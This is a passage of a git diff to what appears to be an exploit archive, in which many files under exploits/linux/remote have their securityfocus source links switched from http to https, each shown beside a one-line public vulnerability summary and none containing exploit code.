@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28370/info +// source: https://www.securityfocus.com/bid/28370/info The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31540.php b/exploits/linux/remote/31540.php index 5edb44fbe..36efc7397 100644 --- a/exploits/linux/remote/31540.php +++ b/exploits/linux/remote/31540.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28457/info +source: https://www.securityfocus.com/bid/28457/info PECL Alternative PHP Cache (APC) extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31591.txt b/exploits/linux/remote/31591.txt index d8beb771a..116bc169c 100644 --- a/exploits/linux/remote/31591.txt +++ b/exploits/linux/remote/31591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28577/info +source: https://www.securityfocus.com/bid/28577/info LANDesk Management Suite is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/31630.txt b/exploits/linux/remote/31630.txt index 5526145fd..68f89519d 100644 --- a/exploits/linux/remote/31630.txt +++ b/exploits/linux/remote/31630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28694/info +source: https://www.securityfocus.com/bid/28694/info Adobe Flash Player is prone to a remote code-execution vulnerability when handling certain embedded ActionScript objects. diff --git a/exploits/linux/remote/31887.txt b/exploits/linux/remote/31887.txt index 97392ffde..1a6c4096d 100644 --- a/exploits/linux/remote/31887.txt +++ b/exploits/linux/remote/31887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29585/info +source: https://www.securityfocus.com/bid/29585/info ALFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client. diff --git a/exploits/linux/remote/31903.asm b/exploits/linux/remote/31903.asm index ea1a60fdf..f4d91608d 100644 --- a/exploits/linux/remote/31903.asm +++ b/exploits/linux/remote/31903.asm 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29656/info +source: https://www.securityfocus.com/bid/29656/info NASM is prone to an off-by-one buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32012.txt b/exploits/linux/remote/32012.txt index 4bd73a132..e1b73c9bf 100644 --- a/exploits/linux/remote/32012.txt +++ b/exploits/linux/remote/32012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30115/info +source: https://www.securityfocus.com/bid/30115/info Netrw is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/linux/remote/32133.txt b/exploits/linux/remote/32133.txt index aaf06b0e7..5bdb093b5 100644 --- a/exploits/linux/remote/32133.txt +++ b/exploits/linux/remote/32133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30467/info +source: https://www.securityfocus.com/bid/30467/info The 'libxslt' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32165.txt b/exploits/linux/remote/32165.txt index f56396717..7a1371362 100644 --- a/exploits/linux/remote/32165.txt +++ b/exploits/linux/remote/32165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30535/info +source: https://www.securityfocus.com/bid/30535/info XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32166.txt b/exploits/linux/remote/32166.txt index f47830d6a..7a7f953da 100644 --- a/exploits/linux/remote/32166.txt +++ b/exploits/linux/remote/32166.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30535/info +source: https://www.securityfocus.com/bid/30535/info XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32225.txt b/exploits/linux/remote/32225.txt index bdaf3354c..78c00bb5a 100644 --- a/exploits/linux/remote/32225.txt +++ b/exploits/linux/remote/32225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30648/info +source: https://www.securityfocus.com/bid/30648/info Vim is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32228.xml b/exploits/linux/remote/32228.xml index cdc7c8800..84881816f 100644 --- a/exploits/linux/remote/32228.xml +++ b/exploits/linux/remote/32228.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30661/info +source: https://www.securityfocus.com/bid/30661/info Bugzilla is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/32286.txt b/exploits/linux/remote/32286.txt index 333900817..d7c41162b 100644 --- a/exploits/linux/remote/32286.txt +++ b/exploits/linux/remote/32286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30780/info +source: https://www.securityfocus.com/bid/30780/info Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server. diff --git a/exploits/linux/remote/32289.txt b/exploits/linux/remote/32289.txt index ca7b8a7c2..9d2749173 100644 --- a/exploits/linux/remote/32289.txt +++ b/exploits/linux/remote/32289.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30795/info +source: https://www.securityfocus.com/bid/30795/info Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/linux/remote/32303.txt b/exploits/linux/remote/32303.txt index a810b8d78..9aec5f7e3 100644 --- a/exploits/linux/remote/32303.txt +++ b/exploits/linux/remote/32303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30867/info +source: https://www.securityfocus.com/bid/30867/info Mono is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. diff --git a/exploits/linux/remote/32445.txt b/exploits/linux/remote/32445.txt index 4fae35236..719fcbc13 100644 --- a/exploits/linux/remote/32445.txt +++ b/exploits/linux/remote/32445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31486/info +source: https://www.securityfocus.com/bid/31486/info MySQL is prone to an HTML-injection vulnerability because the application's command-line client fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/32470.rb b/exploits/linux/remote/32470.rb index 8637123d6..724e51fc5 100755 --- a/exploits/linux/remote/32470.rb +++ b/exploits/linux/remote/32470.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31688/info +source: https://www.securityfocus.com/bid/31688/info CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter. diff --git a/exploits/linux/remote/32530.txt b/exploits/linux/remote/32530.txt index 4963e1305..be62bc642 100644 --- a/exploits/linux/remote/32530.txt +++ b/exploits/linux/remote/32530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31917/info +source: https://www.securityfocus.com/bid/31917/info Lynx is prone to a local code-execution vulnerability. 
diff --git a/exploits/linux/remote/32548.html b/exploits/linux/remote/32548.html index 717d20176..ddef7b41b 100644 --- a/exploits/linux/remote/32548.html +++ b/exploits/linux/remote/32548.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31991/info +source: https://www.securityfocus.com/bid/31991/info Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32690.txt b/exploits/linux/remote/32690.txt index 446a96f1d..fdaaa6c1a 100644 --- a/exploits/linux/remote/32690.txt +++ b/exploits/linux/remote/32690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33060/info +source: https://www.securityfocus.com/bid/33060/info The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. diff --git a/exploits/linux/remote/32691.txt b/exploits/linux/remote/32691.txt index 75d690420..47fff11c4 100644 --- a/exploits/linux/remote/32691.txt +++ b/exploits/linux/remote/32691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33066/info +source: https://www.securityfocus.com/bid/33066/info Audio File Library ('libaudiofile') is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data. diff --git a/exploits/linux/remote/32780.py b/exploits/linux/remote/32780.py index 723b2e047..f2e06dfcc 100755 --- a/exploits/linux/remote/32780.py +++ b/exploits/linux/remote/32780.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33674/info +source: https://www.securityfocus.com/bid/33674/info PyCrypto (Python Cryptography Toolkit) is prone to a buffer-overflow vulnerability because it fails to adequately verify user-supplied input. diff --git a/exploits/linux/remote/32796.txt b/exploits/linux/remote/32796.txt index a92452150..60c210452 100644 --- a/exploits/linux/remote/32796.txt +++ b/exploits/linux/remote/32796.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33716/info +source: https://www.securityfocus.com/bid/33716/info Swann DVR4 SecuraNet is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/32825.txt b/exploits/linux/remote/32825.txt index df795388b..7d56db039 100644 --- a/exploits/linux/remote/32825.txt +++ b/exploits/linux/remote/32825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33937/info +source: https://www.securityfocus.com/bid/33937/info The 'djbdns' package is prone to a remote cache-poisoning vulnerability. diff --git a/exploits/linux/remote/32834.txt b/exploits/linux/remote/32834.txt index f772d6702..45571ca67 100644 --- a/exploits/linux/remote/32834.txt +++ b/exploits/linux/remote/32834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33962/info +source: https://www.securityfocus.com/bid/33962/info cURL/libcURL is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/32837.py b/exploits/linux/remote/32837.py index 0120c828f..09ab3b46d 100755 --- a/exploits/linux/remote/32837.py +++ b/exploits/linux/remote/32837.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33971/info +source: https://www.securityfocus.com/bid/33971/info Wesnoth is prone to a remote code-execution vulnerability caused by a design error. diff --git a/exploits/linux/remote/32929.txt b/exploits/linux/remote/32929.txt index d427c2e75..5545a15e4 100644 --- a/exploits/linux/remote/32929.txt +++ b/exploits/linux/remote/32929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34606/info +source: https://www.securityfocus.com/bid/34606/info Red Hat Stronghold Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32942.txt b/exploits/linux/remote/32942.txt index 98da2f2e1..e0df488dc 100644 
--- a/exploits/linux/remote/32942.txt +++ b/exploits/linux/remote/32942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34656/info +source: https://www.securityfocus.com/bid/34656/info The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey. diff --git a/exploits/linux/remote/32965.c b/exploits/linux/remote/32965.c index 3948741c7..24124b427 100644 --- a/exploits/linux/remote/32965.c +++ b/exploits/linux/remote/32965.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34783/info +// source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: diff --git a/exploits/linux/remote/33032.txt b/exploits/linux/remote/33032.txt index 2497567cc..185eebdcd 100644 --- a/exploits/linux/remote/33032.txt +++ b/exploits/linux/remote/33032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35307/info +source: https://www.securityfocus.com/bid/35307/info The 'Compress::Raw::Zlib' Perl module is prone to a remote code-execution vulnerability. diff --git a/exploits/linux/remote/33034.txt b/exploits/linux/remote/33034.txt index 1c6c1c8e4..b80f3be92 100644 --- a/exploits/linux/remote/33034.txt +++ b/exploits/linux/remote/33034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35321/info +source: https://www.securityfocus.com/bid/35321/info WebKit is prone to a remote information-disclosure vulnerability. diff --git a/exploits/linux/remote/33039.txt b/exploits/linux/remote/33039.txt index eb180dce4..bbdeecf60 100644 --- a/exploits/linux/remote/33039.txt +++ b/exploits/linux/remote/33039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35388/info +source: https://www.securityfocus.com/bid/35388/info Mozilla Firefox and SeaMonkey are affected by a URI-spoofing vulnerability because they fail to adequately handle user-supplied data. 
diff --git a/exploits/linux/remote/33053.txt b/exploits/linux/remote/33053.txt index 880e9227b..b3f7121b6 100644 --- a/exploits/linux/remote/33053.txt +++ b/exploits/linux/remote/33053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35472/info +source: https://www.securityfocus.com/bid/35472/info Samba is prone to multiple vulnerabilities. diff --git a/exploits/linux/remote/33103.html b/exploits/linux/remote/33103.html index 1c40b0ea5..fa74c5d5b 100644 --- a/exploits/linux/remote/33103.html +++ b/exploits/linux/remote/33103.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35803/info +source: https://www.securityfocus.com/bid/35803/info Mozilla Firefox is affected by a URI-spoofing vulnerability. diff --git a/exploits/linux/remote/33311.txt b/exploits/linux/remote/33311.txt index 5bd8b41f2..db10f6c5a 100644 --- a/exploits/linux/remote/33311.txt +++ b/exploits/linux/remote/33311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36845/info +source: https://www.securityfocus.com/bid/36845/info KDE is prone to multiple input-validation vulnerabilities that affect 'Ark', 'IO Slaves', and 'Kmail'. diff --git a/exploits/linux/remote/33313.txt b/exploits/linux/remote/33313.txt index 8d2d6be06..d022fc824 100644 --- a/exploits/linux/remote/33313.txt +++ b/exploits/linux/remote/33313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36855/info +source: https://www.securityfocus.com/bid/36855/info Mozilla Firefox and SeaMonkey are prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/linux/remote/33315.java b/exploits/linux/remote/33315.java index 48a17e975..b92530c3d 100644 --- a/exploits/linux/remote/33315.java +++ b/exploits/linux/remote/33315.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36881/info +source: https://www.securityfocus.com/bid/36881/info Sun has released updates to address multiple security vulnerabilities in Java SE. 
diff --git a/exploits/linux/remote/33364.txt b/exploits/linux/remote/33364.txt index eb56ca99b..946d55952 100644 --- a/exploits/linux/remote/33364.txt +++ b/exploits/linux/remote/33364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37080/info +source: https://www.securityfocus.com/bid/37080/info KDE is prone to a remote code-execution vulnerability that affects KDELibs. diff --git a/exploits/linux/remote/33388.f b/exploits/linux/remote/33388.f index b962532a5..1c1340e92 100644 --- a/exploits/linux/remote/33388.f +++ b/exploits/linux/remote/33388.f @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37193/info +source: https://www.securityfocus.com/bid/37193/info Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/33402.txt b/exploits/linux/remote/33402.txt index c9d185d4b..25205b15d 100644 --- a/exploits/linux/remote/33402.txt +++ b/exploits/linux/remote/33402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37322/info +source: https://www.securityfocus.com/bid/37322/info Ruby on Rails is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/linux/remote/33535.txt b/exploits/linux/remote/33535.txt index da0108738..f2fe2e792 100644 --- a/exploits/linux/remote/33535.txt +++ b/exploits/linux/remote/33535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37842/info +source: https://www.securityfocus.com/bid/37842/info SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/33598.rb b/exploits/linux/remote/33598.rb index f0bc99eae..3deb60c16 100755 --- a/exploits/linux/remote/33598.rb +++ b/exploits/linux/remote/33598.rb 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38111/info +source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/33599.txt b/exploits/linux/remote/33599.txt index f843691f4..74421a819 100644 --- a/exploits/linux/remote/33599.txt +++ b/exploits/linux/remote/33599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38111/info +source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/33620.txt b/exploits/linux/remote/33620.txt index a1057ee4e..1c112b5b2 100644 --- a/exploits/linux/remote/33620.txt +++ b/exploits/linux/remote/33620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38161/info +source: https://www.securityfocus.com/bid/38161/info Helix Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/33622.txt b/exploits/linux/remote/33622.txt index 3d8485009..90a16818e 100644 --- a/exploits/linux/remote/33622.txt +++ b/exploits/linux/remote/33622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38176/info +source: https://www.securityfocus.com/bid/38176/info Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: diff --git a/exploits/linux/remote/33752.html b/exploits/linux/remote/33752.html index 8a4b2e5aa..f99aeff98 100644 --- a/exploits/linux/remote/33752.html +++ b/exploits/linux/remote/33752.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38689/info +source: https://www.securityfocus.com/bid/38689/info WebKit is prone to a remote memory-corruption vulnerability; fixes are available. 
diff --git a/exploits/linux/remote/33783.txt b/exploits/linux/remote/33783.txt index 71c15ea29..149af5da5 100644 --- a/exploits/linux/remote/33783.txt +++ b/exploits/linux/remote/33783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38893/info +source: https://www.securityfocus.com/bid/38893/info Astaro Security Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/33798.html b/exploits/linux/remote/33798.html index bc5084a2b..8bec053cb 100644 --- a/exploits/linux/remote/33798.html +++ b/exploits/linux/remote/33798.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38927/info +source: https://www.securityfocus.com/bid/38927/info Mozilla Firefox is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/33826.txt b/exploits/linux/remote/33826.txt index af8750e24..a67a5a57d 100644 --- a/exploits/linux/remote/33826.txt +++ b/exploits/linux/remote/33826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39315/info +source: https://www.securityfocus.com/bid/39315/info TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code. diff --git a/exploits/linux/remote/33855.txt b/exploits/linux/remote/33855.txt index 0039587a8..57b09cb25 100644 --- a/exploits/linux/remote/33855.txt +++ b/exploits/linux/remote/33855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39599/info +source: https://www.securityfocus.com/bid/39599/info MIT Kerberos is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/remote/33949.txt b/exploits/linux/remote/33949.txt index 69ecd0cd4..cb4c5b788 100644 --- a/exploits/linux/remote/33949.txt +++ b/exploits/linux/remote/33949.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39974/info +source: https://www.securityfocus.com/bid/39974/info PCRE is prone to a buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/34152.txt b/exploits/linux/remote/34152.txt index 4cd9746e3..8076aa191 100644 --- a/exploits/linux/remote/34152.txt +++ b/exploits/linux/remote/34152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40897/info +source: https://www.securityfocus.com/bid/40897/info CUPS is prone to a remote information-disclosure vulnerability. This issue affects the CUPS web interface component. diff --git a/exploits/linux/remote/34192.txt b/exploits/linux/remote/34192.txt index e5298fa25..38a7daeba 100644 --- a/exploits/linux/remote/34192.txt +++ b/exploits/linux/remote/34192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41082/info +source: https://www.securityfocus.com/bid/41082/info Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a remote integer-overflow vulnerability. diff --git a/exploits/linux/remote/34201.txt b/exploits/linux/remote/34201.txt index aebb3cb4c..537462029 100644 --- a/exploits/linux/remote/34201.txt +++ b/exploits/linux/remote/34201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41161/info +source: https://www.securityfocus.com/bid/41161/info feh is prone to a remote code-execution vulnerability. diff --git a/exploits/linux/remote/34358.txt b/exploits/linux/remote/34358.txt index abc62c97b..1ce43a125 100644 --- a/exploits/linux/remote/34358.txt +++ b/exploits/linux/remote/34358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41842/info +source: https://www.securityfocus.com/bid/41842/info Mozilla Firefox and SeaMonkey are prone to a buffer-overflow vulnerability. diff --git a/exploits/linux/remote/34385.txt b/exploits/linux/remote/34385.txt index 72afc61f0..e67fb2da9 100644 
--- a/exploits/linux/remote/34385.txt +++ b/exploits/linux/remote/34385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42026/info +source: https://www.securityfocus.com/bid/42026/info KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/34426.txt b/exploits/linux/remote/34426.txt index 080e145b9..12038e84e 100644 --- a/exploits/linux/remote/34426.txt +++ b/exploits/linux/remote/34426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42297/info +source: https://www.securityfocus.com/bid/42297/info uzbl 'uzbl-core' is prone to a vulnerability that lets attackers inject arbitrary commands because the application fails to adequately sanitize user-supplied input. This issue stems from an insecure default configuration setting. diff --git a/exploits/linux/remote/34431.html b/exploits/linux/remote/34431.html index f54be9fcd..78a6210d9 100644 --- a/exploits/linux/remote/34431.html +++ b/exploits/linux/remote/34431.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42322/info +source: https://www.securityfocus.com/bid/42322/info Nagios XI is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. diff --git a/exploits/linux/remote/34507.txt b/exploits/linux/remote/34507.txt index 4f66a0edd..2c5bb4da0 100644 --- a/exploits/linux/remote/34507.txt +++ b/exploits/linux/remote/34507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42604/info +source: https://www.securityfocus.com/bid/42604/info Nagios XI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/34881.html b/exploits/linux/remote/34881.html index e2f32e68c..b1c14b8b1 100644 --- a/exploits/linux/remote/34881.html +++ b/exploits/linux/remote/34881.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44247/info +source: https://www.securityfocus.com/bid/44247/info Mozilla Firefox, Thunderbird, and Seamonkey are prone to a memory-corruption vulnerability because they fail to adequately validate user-supplied data. diff --git a/exploits/linux/remote/34932.html b/exploits/linux/remote/34932.html index 6d8d70b6d..e93bf3957 100644 --- a/exploits/linux/remote/34932.html +++ b/exploits/linux/remote/34932.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44421/info +source: https://www.securityfocus.com/bid/44421/info NitroView ESM is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/linux/remote/34998.txt b/exploits/linux/remote/34998.txt index afe9065c0..917bbbb36 100644 --- a/exploits/linux/remote/34998.txt +++ b/exploits/linux/remote/34998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44883/info +source: https://www.securityfocus.com/bid/44883/info Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/34999.txt b/exploits/linux/remote/34999.txt index aa8d416fe..e59105487 100644 --- a/exploits/linux/remote/34999.txt +++ b/exploits/linux/remote/34999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44883/info +source: https://www.securityfocus.com/bid/44883/info Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35011.txt b/exploits/linux/remote/35011.txt index d4303edec..be784b6e6 100644 --- a/exploits/linux/remote/35011.txt +++ b/exploits/linux/remote/35011.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45015/info +source: https://www.securityfocus.com/bid/45015/info Apache Tomcat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35095.txt b/exploits/linux/remote/35095.txt index 4c2b7a2da..0ee383a5e 100644 --- a/exploits/linux/remote/35095.txt +++ b/exploits/linux/remote/35095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45353/info +source: https://www.securityfocus.com/bid/45353/info Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/linux/remote/35132.txt b/exploits/linux/remote/35132.txt index a034b2ca7..7a5bfbdc6 100644 --- a/exploits/linux/remote/35132.txt +++ b/exploits/linux/remote/35132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45537/info +source: https://www.securityfocus.com/bid/45537/info Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/35148.txt b/exploits/linux/remote/35148.txt index 10cce0b1f..9a17ec408 100644 --- a/exploits/linux/remote/35148.txt +++ b/exploits/linux/remote/35148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45582/info +source: https://www.securityfocus.com/bid/45582/info IBM Tivoli Access Manager for e-business is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/35232.txt b/exploits/linux/remote/35232.txt index 38d25eb35..d8e13ffc1 100644 --- a/exploits/linux/remote/35232.txt +++ b/exploits/linux/remote/35232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45842/info +source: https://www.securityfocus.com/bid/45842/info Pango is prone to a remote heap-corruption vulnerability. 
diff --git a/exploits/linux/remote/35314.txt b/exploits/linux/remote/35314.txt index 5808acafd..eb941323d 100644 --- a/exploits/linux/remote/35314.txt +++ b/exploits/linux/remote/35314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46167/info +source: https://www.securityfocus.com/bid/46167/info Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files. diff --git a/exploits/linux/remote/35386.txt b/exploits/linux/remote/35386.txt index d0f128d1c..119170c0d 100644 --- a/exploits/linux/remote/35386.txt +++ b/exploits/linux/remote/35386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46554/info +source: https://www.securityfocus.com/bid/46554/info Logwatch is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/remote/35466.sh b/exploits/linux/remote/35466.sh index 70ecce34a..99d14ed93 100755 --- a/exploits/linux/remote/35466.sh +++ b/exploits/linux/remote/35466.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46880/info +source: https://www.securityfocus.com/bid/46880/info nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data. diff --git a/exploits/linux/remote/35554.txt b/exploits/linux/remote/35554.txt index 4eda367a9..19eda29be 100644 --- a/exploits/linux/remote/35554.txt +++ b/exploits/linux/remote/35554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47124/info +source: https://www.securityfocus.com/bid/47124/info Perl is prone to a security-bypass weakness that occurs when laundering tainted input. diff --git a/exploits/linux/remote/35606.txt b/exploits/linux/remote/35606.txt index 4538433f4..c4ee9bb19 100644 --- a/exploits/linux/remote/35606.txt +++ b/exploits/linux/remote/35606.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47310/info +source: https://www.securityfocus.com/bid/47310/info MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'. diff --git a/exploits/linux/remote/35644.txt b/exploits/linux/remote/35644.txt index 299b79c69..71cfdafcc 100644 --- a/exploits/linux/remote/35644.txt +++ b/exploits/linux/remote/35644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47509/info +source: https://www.securityfocus.com/bid/47509/info Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/35784.php b/exploits/linux/remote/35784.php index 707b06b10..037e8bcde 100644 --- a/exploits/linux/remote/35784.php +++ b/exploits/linux/remote/35784.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47919/info +source: https://www.securityfocus.com/bid/47919/info Zend Framework is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/35785.txt b/exploits/linux/remote/35785.txt index a50104208..49b17527e 100644 --- a/exploits/linux/remote/35785.txt +++ b/exploits/linux/remote/35785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47924/info +source: https://www.securityfocus.com/bid/47924/info klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35799.txt b/exploits/linux/remote/35799.txt index 33500b002..8f0c6d0cf 100644 --- a/exploits/linux/remote/35799.txt +++ b/exploits/linux/remote/35799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47975/info +source: 